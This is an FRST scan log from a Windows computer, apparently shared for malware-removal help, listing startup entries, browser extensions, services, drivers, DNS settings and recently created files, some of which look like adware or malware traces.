HKLM\...\Run: [RtHDVBg_Dolby] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1212048 2012-06-07] (Realtek Semiconductor)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
HKLM\...\Run: [BtPreLoad] => C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [64640 2012-08-10] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-10-16] (Apple Inc.)
HKLM-x32\...\Run: [Dolby Home Theater v4] => C:\Dolby PCEE4\pcee4.exe [508256 2012-04-23] (Dolby Laboratories Inc.)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [mcui_exe] => "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
HKLM-x32\...\Run: [Cisco AnyConnect Secure Mobility Agent for Windows] => C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnui.exe [708496 2015-07-22] (Cisco Systems, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [uTorrent] => C:\Users\owner\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-02] (BitTorrent Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify Web Helper] => C:\Users\owner\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50378880 2015-12-17] (Skype Technologies S.A.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Spotify] => C:\Users\owner\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-21] (Spotify Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [Birds] => C:\Users\owner\AppData\Local\Birds\birds365.exe [113664 2016-01-09] (Birds)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
HKU\S-1-5-21-3773202632-424774445-890114178-1001\...\Policies\system: [DisableTaskMgr] 1
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer Backup Manager Tray.lnk [2016-01-10]
ShortcutTarget: Acer Backup Manager Tray.lnk -> C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe (NTI Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{1CF1C519-43BC-43DC-A100-5452BECE63BD}: [DhcpNameServer] 192.168.1.254 75.153.176.1
Tcpip\..\Interfaces\{22E2DD4D-5728-4E97-8740-AA750D016189}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{3D911366-3BDF-44E8-8347-B89013568C76}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{559265AC-3060-4BF7-B113-B1CA25913253}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{6504a844-a2c7-11e4-824e-806e6f6e6963}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [NameServer] 104.197.191.4
Tcpip\..\Interfaces\{DD3443D7-3BB0-4CD6-95B5-911D51D04343}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKU\S-1-5-21-3773202632-424774445-890114178-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer13.msn.com
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10] (Qualcomm Atheros Commnucations)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2011-02-11] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-31] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-12-21] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-31] (Oracle Corporation)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-02] (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/.com/?site=shyosffdefault&prd=set_ff&s=G1Azbwybl01,2e5a8f18-7777-4848-9eed-2132ef3331e1,
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_267.dll [2015-12-28] ()
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_267.dll [2015-12-28] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-31] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll [2014-11-14] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-09-30] (Adobe Systems Inc.)
FF user.js: detected! => C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\user.js [2016-01-09]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2015-10-03]
FF Extension: McAfee WebAdvisor - C:\Users\owner\AppData\Roaming\Mozilla\Firefox\Profiles\2ptnmu3o.default\extensions\{4ED1F68A-5463-4931-9384-8FFF5ED91D92}.xpi [2015-08-04] [not signed]
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome:
=======
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-09]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-09]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-09]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-09]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-09]
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Slides) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-25]
CHR Extension: (Google Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-25]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-25]
CHR Extension: (Google Sheets) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-25]
CHR Extension: (SiteAdvisor) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-25]
CHR Extension: (Google Docs Offline) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-25]
CHR Extension: (Taplika New Tab) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lfkjojacgdjkninepeghaamnapdjmlfn [2015-11-25]
CHR Extension: (Skype Click to Call) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-11-25]
CHR Extension: (Chrome Web Store Payments) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-25]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-25]
CHR HKLM\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [538112 2016-01-09] () [File not signed]
S2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [211584 2012-08-10] (Qualcomm Atheros Commnucations) [File not signed]
S2 BrcmCardReader; C:\Program Files\Broadcom\MemoryCard\BrcmCardReader.exe [176640 2012-08-20] (Broadcom Corp.) [File not signed]
S2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
S2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
S2 cmdidx; C:\Program Files\cmdidx\cmdidx.exe [383488 2016-01-09] () [File not signed]
S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
S2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation)
S2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-10-09] (Dritek System INC.)
S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [836176 2015-12-14] (Valve Corporation) [File not signed]
S2 Task Server; C:\Program Files\Task Server\TaskServer.exe [796160 2016-01-09] (Copyright © Microsoft 2015) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
S2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-07-31] (Atheros) [File not signed]
S2 extradoynldownkzhd; C:\Users\owner\AppData\Local\Donelectronics.exe aoonloaduo extradoynldownkzhd [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-08-10] (Qualcomm Atheros)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
R0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-10] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-10-09] (Dritek System Inc.)
S3 usbrndis6; C:\Windows\system32\DRIVERS\usb80236.sys [20992 2013-08-22] (Microsoft Corporation)
S3 voxaldriver; C:\Windows\system32\DRIVERS\voxaldriverx64.sys [34512 2015-10-26] ()
S3 vpnva; C:\Windows\system32\DRIVERS\vpnva64-6.sys [52592 2014-10-16] (Cisco Systems, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44024 2015-02-03] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [264000 2015-02-03] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 20:45 - 2016-01-10 20:45 - 00000000 ____D C:\Program Files\Task Service
2016-01-10 20:44 - 2016-01-10 20:44 - 00000000 ____D C:\Program Files\Scan Service
2016-01-10 20:41 - 2016-01-10 20:41 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2016-01-10 18:13 - 2016-01-10 21:12 - 00000000 ____D C:\FRST
2016-01-10 15:07 - 2016-01-10 20:45 - 00071168 _____ (Microsoft) C:\WINDOWS\system32\WindowsLock.exe
2016-01-10 15:07 - 2016-01-10 20:44 - 00140288 _____ (Microsoft) C:\WINDOWS\system32\MalwareScanner.exe
2016-01-10 14:30 - 2016-01-10 15:21 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-01-10 14:30 - 2016-01-10 14:56 - 00001112 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-01-10 14:30 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-01-10 14:30 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-01-09 21:13 - 2016-01-10 20:49 - 00000000 ____D C:\Users\owner\AppData\Local\CrashDumps
2016-01-09 21:08 - 2016-01-10 14:56 - 00001422 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-01-09 21:00 - 2016-01-09 21:00 - 00000000 ____D C:\ProgramData\fc7235fa-41a3-1
2016-01-09 20:58 - 2016-01-09 20:58 - 00000000 ____D C:\ProgramData\ad8a10da-14d7-1
2016-01-09 20:57 - 2016-01-09 20:57 - 00000000 ____D C:\Program Files (x86)\ExploreTech
2016-01-09 20:11 - 2016-01-09 20:11 - 00000000 ____D C:\Program Files (x86)\predm
2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\Users\owner\AppData\Local\NPE
2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\ProgramData\Norton
2016-01-09 19:33 - 2016-01-10 21:13 - 00916216 _____ C:\WINDOWS\ntbtlog.txt
2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (5).exe
2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (4).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (3).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (2).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 00002782 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-01-09 18:42 - 2016-01-10 14:56 - 00000876 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\Program Files\CCleaner
2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513.exe
2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (1).exe
2016-01-09 18:16 - 2016-01-09 18:16 - 00003242 _____ C:\WINDOWS\System32\Tasks\IBUpd2
2016-01-09 18:15 - 2016-01-09 18:15 - 00022184 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
2016-01-09 18:15 - 2016-01-09 18:15 - 00003406 _____ C:\WINDOWS\System32\Tasks\RSPro
2016-01-09 18:14 - 2016-01-09 18:14 - 00000008 _____ C:\END
2016-01-09 18:09 - 2016-01-10 21:08 - 00000282 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-01-09 18:09 - 2016-01-09 19:14 - 00000282 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-01-09 18:09 - 2016-01-09 18:09 - 00003568 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-01-09 18:09 - 2016-01-09 18:09 - 00003232 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2016-01-09 18:09 - 2016-01-09 18:09 - 00002832 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-01-09 18:09 - 2016-01-09 18:09 - 00002536 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-78e1-0
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-3443-1
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-2473-0
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-09a5-1
2016-01-09 18:00 - 2016-01-09 18:00 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-01-09 17:18 - 2016-01-09 17:18 - 00000015 _____ C:\WINDOWS\system32\config.conf
2016-01-09 17:18 - 2016-01-09 17:18 - 00000000 ____D C:\WINDOWS\system32\jurk
2016-01-09 17:10 - 2016-01-09 17:59 - 00000000 ____D C:\Users\owner\AppData\Local\DailyWiki
2016-01-09 17:08 - 2016-01-09 17:57 - 00003426 _____ C:\WINDOWS\System32\Tasks\Olunnuag
2016-01-09 16:42 - 2016-01-10 21:08 - 00000280 _____ C:\WINDOWS\Tasks\Goose.job
2016-01-09 16:42 - 2016-01-09 19:26 - 00004720 _____ C:\WINDOWS\SysWOW64\Kefzha.ini
2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\SysWOW64\KefzhaOff.ini
2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\system32\KefzhaOff.ini
2016-01-09 16:42 - 2016-01-09 16:42 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foebyyc
2016-01-09 16:42 - 2016-01-09 16:42 - 00002474 _____ C:\WINDOWS\System32\Tasks\Goose
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\Company
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Tempfolder
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds365
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\uninst
2016-01-09 16:42 - 2016-01-09 15:28 - 00768376 _____ C:\WINDOWS\system32\Kefzha64.dll
2016-01-09 16:42 - 2016-01-09 15:28 - 00289144 _____ C:\WINDOWS\SysWOW64\Kefzha.dll
2016-01-09 16:38 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Setup Support for Looksafe
2016-01-09 16:38 - 2016-01-09 16:38 - 00003690 _____ C:\WINDOWS\System32\Tasks\GTNU_635879831232953538
2016-01-09 16:38 - 2016-01-09 16:38 - 00003338 _____ C:\WINDOWS\System32\Tasks\GNU_635879831225933307
2016-01-09 16:36 - 2016-01-09 16:36 - 00004956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P
2016-01-09 16:36 - 2016-01-09 16:36 - 00004944 _____ C:\WINDOWS\System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837
